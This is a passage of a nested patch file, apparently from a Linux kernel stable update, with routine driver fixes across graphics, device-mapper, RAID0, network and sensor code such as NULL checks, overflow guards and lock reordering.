+ 		return ERR_CAST(obj);
+ 
+-	i915_gem_object_set_cache_coherency(obj, I915_CACHING_CACHED);
++	i915_gem_object_set_cache_coherency(obj, I915_CACHE_LLC);
+ 
+ 	vma = i915_vma_instance(obj, vm, NULL);
+ 	if (IS_ERR(vma)) {
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 7ca00b0323362..f851aaf2c5917 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2117,6 +2117,7 @@ static const struct panel_desc innolux_at043tn24 = {
+ 		.height = 54,
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X24,
++	.connector_type = DRM_MODE_CONNECTOR_DPI,
+ 	.bus_flags = DRM_BUS_FLAG_DE_HIGH | DRM_BUS_FLAG_PIXDATA_DRIVE_POSEDGE,
+ };
+ 
+@@ -3109,6 +3110,7 @@ static const struct drm_display_mode powertip_ph800480t013_idf02_mode = {
+ 	.vsync_start = 480 + 49,
+ 	.vsync_end = 480 + 49 + 2,
+ 	.vtotal = 480 + 49 + 2 + 22,
++	.flags = DRM_MODE_FLAG_NVSYNC | DRM_MODE_FLAG_NHSYNC,
+ };
+ 
+ static const struct panel_desc powertip_ph800480t013_idf02  = {
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index fa1f4ee6d1950..9fea03121247e 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -717,13 +717,13 @@ static void vop_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	if (crtc->state->self_refresh_active)
+ 		rockchip_drm_set_win_enabled(crtc, false);
+ 
++	if (crtc->state->self_refresh_active)
++		goto out;
++
+ 	mutex_lock(&vop->vop_lock);
+ 
+ 	drm_crtc_vblank_off(crtc);
+ 
+-	if (crtc->state->self_refresh_active)
+-		goto out;
+-
+ 	/*
+ 	 * Vop standby will take effect at end of current frame,
+ 	 * if dsp hold valid irq happen, it means standby complete.
+@@ -757,9 +757,9 @@ static void vop_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	vop_core_clks_disable(vop);
+ 	pm_runtime_put(vop->dev);
+ 
+-out:
+ 	mutex_unlock(&vop->vop_lock);
+ 
++out:
+ 	if (crtc->state->event && !crtc->state->active) {
+ 		spin_lock_irq(&crtc->dev->event_lock);
+ 		drm_crtc_send_vblank_event(crtc, crtc->state->event);
+diff --git a/drivers/gpu/drm/ttm/ttm_bo.c b/drivers/gpu/drm/ttm/ttm_bo.c
+index 7c8e8be774f1d..f2c4e9037d6e0 100644
+--- a/drivers/gpu/drm/ttm/ttm_bo.c
++++ b/drivers/gpu/drm/ttm/ttm_bo.c
+@@ -1165,6 +1165,7 @@ int ttm_bo_swapout(struct ttm_buffer_object *bo, struct ttm_operation_ctx *ctx,
+ 		ret = ttm_bo_handle_move_mem(bo, evict_mem, true, &ctx, &hop);
+ 		if (unlikely(ret != 0)) {
+ 			WARN(ret == -EMULTIHOP, "Unexpected multihop in swaput - likely driver bug.\n");
++			ttm_resource_free(bo, &evict_mem);
+ 			goto out;
+ 		}
+ 	}
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+index 6f0d332ccf51c..06bdcf072d10c 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+@@ -132,29 +132,45 @@ static void get_common_inputs(struct common_input_property *common, int report_i
+ 	common->event_type = HID_USAGE_SENSOR_EVENT_DATA_UPDATED_ENUM;
+ }
+ 
+-static int float_to_int(u32 float32)
++static int float_to_int(u32 flt32_val)
+ {
+ 	int fraction, shift, mantissa, sign, exp, zeropre;
+ 
+-	mantissa = float32 & GENMASK(22, 0);
+-	sign = (float32 & BIT(31)) ? -1 : 1;
+-	exp = (float32 & ~BIT(31)) >> 23;
++	mantissa = flt32_val & GENMASK(22, 0);
++	sign = (flt32_val & BIT(31)) ? -1 : 1;
++	exp = (flt32_val & ~BIT(31)) >> 23;
+ 
+ 	if (!exp && !mantissa)
+ 		return 0;
+ 
++	/*
++	 * Calculate the exponent and fraction part of floating
++	 * point representation.
++	 */
+ 	exp -= 127;
+ 	if (exp < 0) {
+ 		exp = -exp;
++		if (exp >= BITS_PER_TYPE(u32))
++			return 0;
+ 		zeropre = (((BIT(23) + mantissa) * 100) >> 23) >> exp;
+ 		return zeropre >= 50 ? sign : 0;
+ 	}
+ 
+ 	shift = 23 - exp;
+-	float32 = BIT(exp) + (mantissa >> shift);
+-	fraction = mantissa & GENMASK(shift - 1, 0);
++	if (abs(shift) >= BITS_PER_TYPE(u32))
++		return 0;
++
++	if (shift < 0) {
++		shift = -shift;
++		flt32_val = BIT(exp) + (mantissa << shift);
++		shift = 0;
++	} else {
++		flt32_val = BIT(exp) + (mantissa >> shift);
++	}
++
++	fraction = (shift == 0) ? 0 : mantissa & GENMASK(shift - 1, 0);
+ 
+-	return (((fraction * 100) >> shift) >= 50) ? sign * (float32 + 1) : sign * float32;
++	return (((fraction * 100) >> shift) >= 50) ? sign * (flt32_val + 1) : sign * flt32_val;
+ }
+ 
+ static u8 get_input_rep(u8 current_index, int sensor_idx, int report_id,
+diff --git a/drivers/iio/adc/meson_saradc.c b/drivers/iio/adc/meson_saradc.c
+index 1a68b099d323c..eb965974ed859 100644
+--- a/drivers/iio/adc/meson_saradc.c
++++ b/drivers/iio/adc/meson_saradc.c
+@@ -71,7 +71,7 @@
+ 	#define MESON_SAR_ADC_REG3_PANEL_DETECT_COUNT_MASK	GENMASK(20, 18)
+ 	#define MESON_SAR_ADC_REG3_PANEL_DETECT_FILTER_TB_MASK	GENMASK(17, 16)
+ 	#define MESON_SAR_ADC_REG3_ADC_CLK_DIV_SHIFT		10
+-	#define MESON_SAR_ADC_REG3_ADC_CLK_DIV_WIDTH		5
++	#define MESON_SAR_ADC_REG3_ADC_CLK_DIV_WIDTH		6
+ 	#define MESON_SAR_ADC_REG3_BLOCK_DLY_SEL_MASK		GENMASK(9, 8)
+ 	#define MESON_SAR_ADC_REG3_BLOCK_DLY_MASK		GENMASK(7, 0)
+ 
+diff --git a/drivers/md/dm-init.c b/drivers/md/dm-init.c
+index b0c45c6ebe0bf..dc4381d683131 100644
+--- a/drivers/md/dm-init.c
++++ b/drivers/md/dm-init.c
+@@ -8,6 +8,7 @@
+  */
+ 
+ #include <linux/ctype.h>
++#include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/device-mapper.h>
+ #include <linux/init.h>
+@@ -18,12 +19,17 @@
+ #define DM_MAX_DEVICES 256
+ #define DM_MAX_TARGETS 256
+ #define DM_MAX_STR_SIZE 4096
++#define DM_MAX_WAITFOR 256
+ 
+ static char *create;
+ 
++static char *waitfor[DM_MAX_WAITFOR];
++
+ /*
+  * Format: dm-mod.create=<name>,<uuid>,<minor>,<flags>,<table>[,<table>+][;<name>,<uuid>,<minor>,<flags>,<table>[,<table>+]+]
+  * Table format: <start_sector> <num_sectors> <target_type> <target_args>
++ * Block devices to wait for to become available before setting up tables:
++ * dm-mod.waitfor=<device1>[,..,<deviceN>]
+  *
+  * See Documentation/admin-guide/device-mapper/dm-init.rst for dm-mod.create="..." format
+  * details.
+@@ -266,7 +272,7 @@ static int __init dm_init_init(void)
+ 	struct dm_device *dev;
+ 	LIST_HEAD(devices);
+ 	char *str;
+-	int r;
++	int i, r;
+ 
+ 	if (!create)
+ 		return 0;
+@@ -286,6 +292,17 @@ static int __init dm_init_init(void)
+ 	DMINFO("waiting for all devices to be available before creating mapped devices");
+ 	wait_for_device_probe();
+ 
++	for (i = 0; i < ARRAY_SIZE(waitfor); i++) {
++		if (waitfor[i]) {
++			DMINFO("waiting for device %s ...", waitfor[i]);
++			while (!dm_get_dev_t(waitfor[i]))
++				msleep(5);
++		}
++	}
++
++	if (waitfor[0])
++		DMINFO("all devices available");
++
+ 	list_for_each_entry(dev, &devices, list) {
+ 		if (dm_early_create(&dev->dmi, dev->table,
+ 				    dev->target_args_array))
+@@ -301,3 +318,6 @@ late_initcall(dm_init_init);
+ 
+ module_param(create, charp, 0);
+ MODULE_PARM_DESC(create, "Create a mapped device in early boot");
++
++module_param_array(waitfor, charp, NULL, 0);
++MODULE_PARM_DESC(waitfor, "Devices to wait for before setting up tables");
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index a2b8f8781a99f..fe7dad3ffa75f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -33,11 +33,11 @@
+ #define DEFAULT_BUFFER_SECTORS		128
+ #define DEFAULT_JOURNAL_WATERMARK	50
+ #define DEFAULT_SYNC_MSEC		10000
+-#define DEFAULT_MAX_JOURNAL_SECTORS	131072
++#define DEFAULT_MAX_JOURNAL_SECTORS	(IS_ENABLED(CONFIG_64BIT) ? 131072 : 8192)
+ #define MIN_LOG2_INTERLEAVE_SECTORS	3
+ #define MAX_LOG2_INTERLEAVE_SECTORS	31
+ #define METADATA_WORKQUEUE_MAX_ACTIVE	16
+-#define RECALC_SECTORS			32768
++#define RECALC_SECTORS			(IS_ENABLED(CONFIG_64BIT) ? 32768 : 2048)
+ #define RECALC_WRITE_SUPER		16
+ #define BITMAP_BLOCK_SIZE		4096	/* don't change it */
+ #define BITMAP_FLUSH_INTERVAL		(10 * HZ)
+diff --git a/drivers/md/dm-verity-loadpin.c b/drivers/md/dm-verity-loadpin.c
+index 4f78cc55c2514..0666699b68581 100644
+--- a/drivers/md/dm-verity-loadpin.c
++++ b/drivers/md/dm-verity-loadpin.c
+@@ -58,6 +58,9 @@ bool dm_verity_loadpin_is_bdev_trusted(struct block_device *bdev)
+ 	int srcu_idx;
+ 	bool trusted = false;
+ 
++	if (bdev == NULL)
++		return false;
++
+ 	if (list_empty(&dm_verity_loadpin_trusted_root_digests))
+ 		return false;
+ 
+diff --git a/drivers/md/raid0.c b/drivers/md/raid0.c
+index b536befd88988..0f7c3b3c62b25 100644
+--- a/drivers/md/raid0.c
++++ b/drivers/md/raid0.c
+@@ -270,6 +270,18 @@ static int create_strip_zones(struct mddev *mddev, struct r0conf **private_conf)
+ 		goto abort;
+ 	}
+ 
++	if (conf->layout == RAID0_ORIG_LAYOUT) {
++		for (i = 1; i < conf->nr_strip_zones; i++) {
++			sector_t first_sector = conf->strip_zone[i-1].zone_end;
++
++			sector_div(first_sector, mddev->chunk_sectors);
++			zone = conf->strip_zone + i;
++			/* disk_shift is first disk index used in the zone */
++			zone->disk_shift = sector_div(first_sector,
++						      zone->nb_dev);
++		}
++	}
++
+ 	pr_debug("md/raid0:%s: done.\n", mdname(mddev));
+ 	*private_conf = conf;
+ 
+@@ -431,6 +443,20 @@ exit_acct_set:
+ 	return ret;
+ }
+ 
++/*
++ * Convert disk_index to the disk order in which it is read/written.
++ *  For example, if we have 4 disks, they are numbered 0,1,2,3. If we
++ *  write the disks starting at disk 3, then the read/write order would
++ *  be disk 3, then 0, then 1, and then disk 2 and we want map_disk_shift()
++ *  to map the disks as follows 0,1,2,3 => 1,2,3,0. So disk 0 would map
++ *  to 1, 1 to 2, 2 to 3, and 3 to 0. That way we can compare disks in
++ *  that 'output' space to understand the read/write disk ordering.
++ */
++static int map_disk_shift(int disk_index, int num_disks, int disk_shift)
++{
++	return ((disk_index + num_disks - disk_shift) % num_disks);
++}
++
+ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ {
+ 	struct r0conf *conf = mddev->private;
+@@ -444,7 +470,9 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	sector_t end_disk_offset;
+ 	unsigned int end_disk_index;
+ 	unsigned int disk;
++	sector_t orig_start, orig_end;
+ 
++	orig_start = start;
+ 	zone = find_zone(conf, &start);
+ 
+ 	if (bio_end_sector(bio) > zone->zone_end) {
+@@ -458,6 +486,7 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	} else
+ 		end = bio_end_sector(bio);
+ 
++	orig_end = end;
+ 	if (zone != conf->strip_zone)
+ 		end = end - zone[-1].zone_end;
+ 
+@@ -469,13 +498,26 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	last_stripe_index = end;
+ 	sector_div(last_stripe_index, stripe_size);
+ 
+-	start_disk_index = (int)(start - first_stripe_index * stripe_size) /
+-		mddev->chunk_sectors;
++	/* In the first zone the original and alternate layouts are the same */
++	if ((conf->layout == RAID0_ORIG_LAYOUT) && (zone != conf->strip_zone)) {
++		sector_div(orig_start, mddev->chunk_sectors);
++		start_disk_index = sector_div(orig_start, zone->nb_dev);
++		start_disk_index = map_disk_shift(start_disk_index,
++						  zone->nb_dev,
++						  zone->disk_shift);
++		sector_div(orig_end, mddev->chunk_sectors);
++		end_disk_index = sector_div(orig_end, zone->nb_dev);
++		end_disk_index = map_disk_shift(end_disk_index,
++						zone->nb_dev, zone->disk_shift);
++	} else {
++		start_disk_index = (int)(start - first_stripe_index * stripe_size) /
++			mddev->chunk_sectors;
++		end_disk_index = (int)(end - last_stripe_index * stripe_size) /
++			mddev->chunk_sectors;
++	}
+ 	start_disk_offset = ((int)(start - first_stripe_index * stripe_size) %
+ 		mddev->chunk_sectors) +
+ 		first_stripe_index * mddev->chunk_sectors;
+-	end_disk_index = (int)(end - last_stripe_index * stripe_size) /
+-		mddev->chunk_sectors;
+ 	end_disk_offset = ((int)(end - last_stripe_index * stripe_size) %
+ 		mddev->chunk_sectors) +
+ 		last_stripe_index * mddev->chunk_sectors;
+@@ -483,18 +525,22 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	for (disk = 0; disk < zone->nb_dev; disk++) {
+ 		sector_t dev_start, dev_end;
+ 		struct md_rdev *rdev;
++		int compare_disk;
++
++		compare_disk = map_disk_shift(disk, zone->nb_dev,
++					      zone->disk_shift);
+ 
+-		if (disk < start_disk_index)
++		if (compare_disk < start_disk_index)
+ 			dev_start = (first_stripe_index + 1) *
+ 				mddev->chunk_sectors;
+-		else if (disk > start_disk_index)
++		else if (compare_disk > start_disk_index)
+ 			dev_start = first_stripe_index * mddev->chunk_sectors;
+ 		else
+ 			dev_start = start_disk_offset;
+ 
+-		if (disk < end_disk_index)
++		if (compare_disk < end_disk_index)
+ 			dev_end = (last_stripe_index + 1) * mddev->chunk_sectors;
+-		else if (disk > end_disk_index)
++		else if (compare_disk > end_disk_index)
+ 			dev_end = last_stripe_index * mddev->chunk_sectors;
+ 		else
+ 			dev_end = end_disk_offset;
+diff --git a/drivers/md/raid0.h b/drivers/md/raid0.h
+index 3816e5477db1e..8cc761ca74230 100644
+--- a/drivers/md/raid0.h
++++ b/drivers/md/raid0.h
+@@ -6,6 +6,7 @@ struct strip_zone {
+ 	sector_t zone_end;	/* Start of the next zone (in sectors) */
+ 	sector_t dev_start;	/* Zone offset in real dev (in sectors) */
+ 	int	 nb_dev;	/* # of devices attached to the zone */
++	int	 disk_shift;	/* start disk for the original layout */
+ };
+ 
+ /* Linux 3.14 (20d0189b101) made an unintended change to
+diff --git a/drivers/mfd/qcom-pm8008.c b/drivers/mfd/qcom-pm8008.c
+index 9f3c4a01b4c1c..4af1d368c321b 100644
+--- a/drivers/mfd/qcom-pm8008.c
++++ b/drivers/mfd/qcom-pm8008.c
+@@ -233,6 +233,7 @@ static const struct of_device_id pm8008_match[] = {
+ 	{ .compatible = "qcom,pm8008", },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, pm8008_match);
+ 
+ static struct i2c_driver pm8008_mfd_driver = {
+ 	.driver = {
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index e5cabb9012135..13518cac076c7 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -1260,7 +1260,7 @@ static int fastrpc_init_create_process(struct fastrpc_user *fl,
+ 
+ 	sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_CREATE, 4, 0);
+ 	if (init.attrs)
+-		sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_CREATE_ATTR, 6, 0);
++		sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_CREATE_ATTR, 4, 0);
+ 
+ 	err = fastrpc_internal_invoke(fl, true, FASTRPC_INIT_HANDLE,
+ 				      sc, args);
+diff --git a/drivers/misc/pci_endpoint_test.c b/drivers/misc/pci_endpoint_test.c
+index 11530b4ec3892..d1e2f22537dbe 100644
+--- a/drivers/misc/pci_endpoint_test.c
++++ b/drivers/misc/pci_endpoint_test.c
+@@ -728,6 +728,10 @@ static long pci_endpoint_test_ioctl(struct file *file, unsigned int cmd,
+ 	struct pci_dev *pdev = test->pdev;
+ 
+ 	mutex_lock(&test->mutex);
++
++	reinit_completion(&test->irq_raised);
++	test->last_irq = -ENODATA;
++
+ 	switch (cmd) {
+ 	case PCITEST_BAR:
+ 		bar = arg;
+@@ -937,6 +941,9 @@ static void pci_endpoint_test_remove(struct pci_dev *pdev)
+ 	if (id < 0)
+ 		return;
+ 
++	pci_endpoint_test_release_irq(test);
++	pci_endpoint_test_free_irq_vectors(test);
++
+ 	misc_deregister(&test->miscdev);
+ 	kfree(misc_device->name);
+ 	kfree(test->name);
+@@ -946,9 +953,6 @@ static void pci_endpoint_test_remove(struct pci_dev *pdev)
+ 			pci_iounmap(pdev, test->bar[bar]);
+ 	}
+ 
+-	pci_endpoint_test_release_irq(test);
+-	pci_endpoint_test_free_irq_vectors(test);
+-
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
+ }
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 074e14225c06a..029a2a302aa65 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -76,6 +76,7 @@
+ #define GENCMDIADDRH(aih, addr)		((aih) | (((addr) >> 16) & 0xffff))
+ 
+ #define DMA_DIR(dir)		((dir) ? NFC_CMD_N2M : NFC_CMD_M2N)
++#define DMA_ADDR_ALIGN		8
+ 
+ #define ECC_CHECK_RETURN_FF	(-1)
+ 
+@@ -842,6 +843,9 @@ static int meson_nfc_read_oob(struct nand_chip *nand, int page)
+ 
+ static bool meson_nfc_is_buffer_dma_safe(const void *buffer)
+ {
++	if ((uintptr_t)buffer % DMA_ADDR_ALIGN)
++		return false;
++
+ 	if (virt_addr_valid(buffer) && (!object_is_on_stack(buffer)))
+ 		return true;
+ 	return false;
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index 7a6166a0c9bcc..b3f7988668996 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -469,6 +469,9 @@ qca8k_phy_eth_busy_wait(struct qca8k_mgmt_eth_data *mgmt_eth_data,
+ 	bool ack;
+ 	int ret;
+ 
++	if (!skb)
++		return -ENOMEM;
++
+ 	reinit_completion(&mgmt_eth_data->rw_done);
+ 
+ 	/* Increment seq_num and set it in the copy pkt */
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 451c3a1b62553..633b321d7fdd9 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -35,6 +35,8 @@
+ 
+ #define ENA_REGS_ADMIN_INTR_MASK 1
+ 
++#define ENA_MAX_BACKOFF_DELAY_EXP 16U
++
+ #define ENA_MIN_ADMIN_POLL_US 100
+ 
+ #define ENA_MAX_ADMIN_POLL_US 5000
+@@ -536,6 +538,7 @@ static int ena_com_comp_status_to_errno(struct ena_com_admin_queue *admin_queue,
+ 
+ static void ena_delay_exponential_backoff_us(u32 exp, u32 delay_us)
+ {
++	exp = min_t(u32, exp, ENA_MAX_BACKOFF_DELAY_EXP);
+ 	delay_us = max_t(u32, ENA_MIN_ADMIN_POLL_US, delay_us);
+ 	delay_us = min_t(u32, delay_us * (1U << exp), ENA_MAX_ADMIN_POLL_US);
+ 	usleep_range(delay_us, 2 * delay_us);
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 1761df8fb7f96..10c7c232cc4ec 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -1492,8 +1492,6 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 
+ 	bgmac->in_init = true;
+ 
+-	bgmac_chip_intrs_off(bgmac);
+-
+ 	net_dev->irq = bgmac->irq;
+ 	SET_NETDEV_DEV(net_dev, bgmac->dev);
+ 	dev_set_drvdata(bgmac->dev, bgmac);
+@@ -1511,6 +1509,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	 */
+ 	bgmac_clk_enable(bgmac, 0);
+ 
++	bgmac_chip_intrs_off(bgmac);
++
+ 	/* This seems to be fixing IRQ by assigning OOB #6 to the core */
+ 	if (!(bgmac->feature_flags & BGMAC_FEAT_IDM_MASK)) {
+ 		if (bgmac->feature_flags & BGMAC_FEAT_IRQ_ID_OOB_6)
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index bf9e246784b6e..1fe8038587ac8 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -664,5 +664,7 @@ void bcmgenet_mii_exit(struct net_device *dev)
+ 	if (of_phy_is_fixed_link(dn))
+ 		of_phy_deregister_fixed_link(dn);
+ 	of_node_put(priv->phy_dn);
++	clk_prepare_enable(priv->clk);
+ 	platform_device_unregister(priv->mii_pdev);
++	clk_disable_unprepare(priv->clk);
+ }
+diff --git a/drivers/net/ethernet/google/gve/gve_ethtool.c b/drivers/net/ethernet/google/gve/gve_ethtool.c
+index 38df602f2869c..033f17cb96be0 100644
+--- a/drivers/net/ethernet/google/gve/gve_ethtool.c
++++ b/drivers/net/ethernet/google/gve/gve_ethtool.c
+@@ -541,6 +541,9 @@ static int gve_get_link_ksettings(struct net_device *netdev,
+ 		err = gve_adminq_report_link_speed(priv);
+ 
+ 	cmd->base.speed = priv->link_speed;
++
++	cmd->base.duplex = DUPLEX_FULL;
++
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 7a5ec3ce3407a..8f77088900e94 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -7852,10 +7852,10 @@ static int
+ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 			 struct tc_mqprio_qopt_offload *mqprio_qopt)
+ {
+-	u64 sum_max_rate = 0, sum_min_rate = 0;
+ 	int non_power_of_2_qcount = 0;
+ 	struct ice_pf *pf = vsi->back;
+ 	int max_rss_q_cnt = 0;
++	u64 sum_min_rate = 0;
+ 	struct device *dev;
+ 	int i, speed;
+ 	u8 num_tc;
+@@ -7871,6 +7871,7 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 	dev = ice_pf_to_dev(pf);
+ 	vsi->ch_rss_size = 0;
+ 	num_tc = mqprio_qopt->qopt.num_tc;
++	speed = ice_get_link_speed_kbps(vsi);
+ 
+ 	for (i = 0; num_tc; i++) {
+ 		int qcount = mqprio_qopt->qopt.count[i];
+@@ -7911,7 +7912,6 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 		 */
+ 		max_rate = mqprio_qopt->max_rate[i];
+ 		max_rate = div_u64(max_rate, ICE_BW_KBPS_DIVISOR);
+-		sum_max_rate += max_rate;
+ 
+ 		/* min_rate is minimum guaranteed rate and it can't be zero */
+ 		min_rate = mqprio_qopt->min_rate[i];
+@@ -7924,6 +7924,12 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 			return -EINVAL;
+ 		}
+ 
++		if (max_rate && max_rate > speed) {
++			dev_err(dev, "TC%d: max_rate(%llu Kbps) > link speed of %u Kbps\n",
++				i, max_rate, speed);
++			return -EINVAL;
++		}
++
+ 		iter_div_u64_rem(min_rate, ICE_MIN_BW_LIMIT, &rem);
+ 		if (rem) {
+ 			dev_err(dev, "TC%d: Min Rate not multiple of %u Kbps",
+@@ -7961,12 +7967,6 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 	    (mqprio_qopt->qopt.offset[i] + mqprio_qopt->qopt.count[i]))
+ 		return -EINVAL;
+ 
+-	speed = ice_get_link_speed_kbps(vsi);
+-	if (sum_max_rate && sum_max_rate > (u64)speed) {
+-		dev_err(dev, "Invalid max Tx rate(%llu) Kbps > speed(%u) Kbps specified\n",
+-			sum_max_rate, speed);
+-		return -EINVAL;
+-	}
+ 	if (sum_min_rate && sum_min_rate > (u64)speed) {
+ 		dev_err(dev, "Invalid min Tx rate(%llu) Kbps > speed (%u) Kbps specified\n",
+ 			sum_min_rate, speed);
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 8cc077b712add..511fc3f412087 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -1707,6 +1707,8 @@ static int igc_ethtool_get_link_ksettings(struct net_device *netdev,
+ 	/* twisted pair */
+ 	cmd->base.port = PORT_TP;
+ 	cmd->base.phy_address = hw->phy.addr;
++	ethtool_link_ksettings_add_link_mode(cmd, supported, TP);
++	ethtool_link_ksettings_add_link_mode(cmd, advertising, TP);
+ 
+ 	/* advertising link modes */
+ 	if (hw->phy.autoneg_advertised & ADVERTISE_10_HALF)
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index b67a6a81474f5..273941f90f066 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -709,7 +709,6 @@ static void igc_configure_tx_ring(struct igc_adapter *adapter,
+ 	/* disable the queue */
+ 	wr32(IGC_TXDCTL(reg_idx), 0);
+ 	wrfl();
+-	mdelay(10);
+ 
+ 	wr32(IGC_TDLEN(reg_idx),
+ 	     ring->count * sizeof(union igc_adv_tx_desc));
+@@ -1015,7 +1014,7 @@ static __le32 igc_tx_launchtime(struct igc_ring *ring, ktime_t txtime,
+ 	ktime_t base_time = adapter->base_time;
+ 	ktime_t now = ktime_get_clocktai();
+ 	ktime_t baset_est, end_of_cycle;
+-	u32 launchtime;
++	s32 launchtime;
+ 	s64 n;
+ 
+ 	n = div64_s64(ktime_sub_ns(now, base_time), cycle_time);
+@@ -1028,7 +1027,7 @@ static __le32 igc_tx_launchtime(struct igc_ring *ring, ktime_t txtime,
+ 			*first_flag = true;
+ 			ring->last_ff_cycle = baset_est;
+ 
+-			if (ktime_compare(txtime, ring->last_tx_cycle) > 0)
++			if (ktime_compare(end_of_cycle, ring->last_tx_cycle) > 0)
+ 				*insert_empty = true;
+ 		}
+ 	}
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index 4e10ced736dbb..d96cdccdc1e1e 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -356,16 +356,35 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 			tsim &= ~IGC_TSICR_TT0;
+ 		}
+ 		if (on) {
++			struct timespec64 safe_start;
+ 			int i = rq->perout.index;
+ 
+ 			igc_pin_perout(igc, i, pin, use_freq);
+-			igc->perout[i].start.tv_sec = rq->perout.start.sec;
++			igc_ptp_read(igc, &safe_start);
++
++			/* PPS output start time is triggered by Target time(TT)
++			 * register. Programming any past time value into TT
++			 * register will cause PPS to never start. Need to make
++			 * sure we program the TT register a time ahead in
++			 * future. There isn't a stringent need to fire PPS out
++			 * right away. Adding +2 seconds should take care of
++			 * corner cases. Let's say if the SYSTIML is close to
++			 * wrap up and the timer keeps ticking as we program the
++			 * register, adding +2seconds is safe bet.
++			 */
++			safe_start.tv_sec += 2;
++
++			if (rq->perout.start.sec < safe_start.tv_sec)
++				igc->perout[i].start.tv_sec = safe_start.tv_sec;
++			else
++				igc->perout[i].start.tv_sec = rq->perout.start.sec;
+ 			igc->perout[i].start.tv_nsec = rq->perout.start.nsec;
+ 			igc->perout[i].period.tv_sec = ts.tv_sec;
+ 			igc->perout[i].period.tv_nsec = ts.tv_nsec;
+-			wr32(trgttimh, rq->perout.start.sec);
++			wr32(trgttimh, (u32)igc->perout[i].start.tv_sec);
+ 			/* For now, always select timer 0 as source. */
+-			wr32(trgttiml, rq->perout.start.nsec | IGC_TT_IO_TIMER_SEL_SYSTIM0);
++			wr32(trgttiml, (u32)(igc->perout[i].start.tv_nsec |
++					     IGC_TT_IO_TIMER_SEL_SYSTIM0));
+ 			if (use_freq)
+ 				wr32(freqout, ns);
+ 			tsauxc |= tsauxc_mask;
+diff --git a/drivers/net/ethernet/marvell/mvneta.c b/drivers/net/ethernet/marvell/mvneta.c
+index 5aefaaff08711..aca5b72cfeec6 100644
+--- a/drivers/net/ethernet/marvell/mvneta.c
